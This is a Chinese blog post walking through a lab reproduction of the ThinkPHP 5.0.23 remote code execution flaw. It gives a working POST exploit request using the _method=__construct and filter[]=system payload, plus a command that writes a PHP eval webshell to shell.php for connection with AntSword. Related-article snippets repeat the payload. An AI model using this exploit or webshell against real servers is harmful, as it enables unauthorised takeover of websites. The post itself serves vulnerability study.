Thinkphp5.0.23 rce

已于 2024-02-28 09:13:30 修改
阅读量634 收藏 3
点赞数 2
分类专栏: # 漏洞基础 文章标签: 网络安全 web安全
于 2024-02-23 09:44:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Continuejww/article/details/136248209
版权

一、成因

ThinkPHP是中国使用极其广泛的PHP开发框架。在其 5.0(<5.0.24) 版本中,框架在获取请求方法时错误地对其进行处理,从而允许攻击者调用 Request 类的任何方法,从而通过特定漏洞链导致 RCE 漏洞。

二、漏洞利用

进入靶场页面
image.png
根据漏洞POC,远程代码执行命令为:id

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id #传入的参数

用burp抓包更改请求方式GET为POST
image.png

写入一句话木马

echo '<?php eval($_POST[cmd]); ?>' > shell.php

image.png

连接蚁剑
image.png

image.png

爱吃大米饭'
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
HW漏洞集合(二)-thinkphp-yaml
HWHXY的博客
03-31 1499
HW漏洞集合(二)-yml版 link:ThinkPHP漏洞总结 11. ThinkPHP 5.0.23远程代码执行 name: poc-yaml-thinkphp5023-method-rce rules: - method: POST path: /index.php?s=captcha headers: Content-Type: application/x-www-form-urlencoded body: | _method=__construc
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP--5.0.23-rce远程代码执行
最新发布
m0_74402888的博客
05-03 482
实现框架的核心类Requests的method方法实现表单请求类伪装,默认为$_POST[‘_method’]变量,却没有对_method属性进行严格校验,可以通过变量覆盖Requests类的属性,在结合框架特性实现对任意函数的调用实现任意代码执行。攻击者可向缓存文件内写入PHP代码,导致远程代码执行。
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
热门推荐
陈瘦瘦的迪迦的博客
12-08 1万+
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现 漏洞形成原因 框架介绍: ThinkPHP是一款运用极广的PHP开发框架。 漏洞引入: 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 漏洞如何利用 1、访问靶机地址+端口号 进入首页 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&meth
[框架漏洞]ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析
Y4tacker的博客
02-12 1763
ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 首先借用师傅的一张图来梳理一下流程 call_user_func调用system造成rce 梳理思路: $this->method可控导致可以调用__contruct()覆盖Request类的filter字段,然后App::run()执行判断debug来决定是否执行$request->param(),并且还有$dispatch['type'] 等于controller或者 method 时会执行$request->param(
ThinkPHP5 Request类method任意方法调用RCE
weixin_43610673的博客
01-24 1411
此时的调用链如下,由array_walk_recursive调用filterValue函数,完成命令执行。从上面可以看到,filter变量清除在module分支中完成的,通过进入其他进行绕过分支。此时的触发点位于记录路由和请求信息的部分,这也是为什么需要开启debug选项。5.0.13版本之前无需开启debug就能rce,之前的版本中下图代码不会在。中重新再设置一次默认filter,这就会覆盖传入的恶意filter类属性。之前的版本仅在路由调度之前进行设置filter,的键名同名的类属性赋值为。
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2394
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
ThinkphpRCE:Thinkphp rce扫描脚本,附带日志扫描
03-19
Thinkphp rce扫描脚本,附带日志扫描 2020.06.18更新 增加使用代理池功能 增加输出到文件功能 去掉了一些使用syetem函数的payload和重复payload(导致IP容易被封住,且必要性不是很大) 优化了一些代码,多个网站的...
漏洞通告ThinkPHP远程代码执行漏洞
05-05
【漏洞通告】ThinkPHP远程代码执行漏洞
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
thinkphp/5.0.23-rce漏洞复现
qq_46804551的博客
04-22 879
环境搭建 访问your-ip:8080 环境搭建成功 漏洞复现 thinkphp 5.0.23(完整版)debug模式 32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx thinkphp 5.0.23(完整版) 33、(post)public/index.php?s=captcha (data) _method=__co
ThinkPHP-5.0.23新的RCE漏洞测试和POC
weixin_30342827的博客
01-12 1957
TP5新RCE漏洞 昨天又是周五,讨厌周五曝漏洞,还得又得加班,算了,还是先验证一波。新的TP5RCE,据说发现者因为上次的RCE,于是又审计了代码,结果发现的。TP5也成了万人轮啊。 测试 环境搭建 windows下phpstudy,然后下载tp5.0.23到相应的www目录下 linux,安装启动apache和php,下载tp5.0.23到相应www目录下 mac(本机) 启动ap...
ThinkPHP5 5.0.23远程代码执行漏洞复现
weixin_51641247的博客
03-16 488
漏洞介绍ThinkPHP5.0.23版本的漏洞:获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
Thinkphp5.0.0~5.0.23 RCE漏洞复现分析
cosmoslin的博客
11-19 6138
漏洞概要 漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。 环境搭建: Phpstudy: OS: Windows PHP: 7.3.4 ThinkPHP: 5.0.22 POC http://xxxxxx.xxx/public/?s=captcha Body _method=__construct&filter[]=system&method=get&get.
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-17 3025
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
ThinkPHP V5的RCE(远程代码执行漏洞)
Home to come
04-18 2090
一、Shell脚本基础知识 1.Shell 输入/输出重定向 常见重定向符号: 1)标准输出 > 覆盖重定向 set -C 关闭覆盖重定向的功能 set +C:恢复 >| 强制重定向 >> 追加重定向 2)标准输入 < a<b :把b交给a执行 tr 替换文件内容(tr set1 [set2])char(字符:一个...
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞。漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值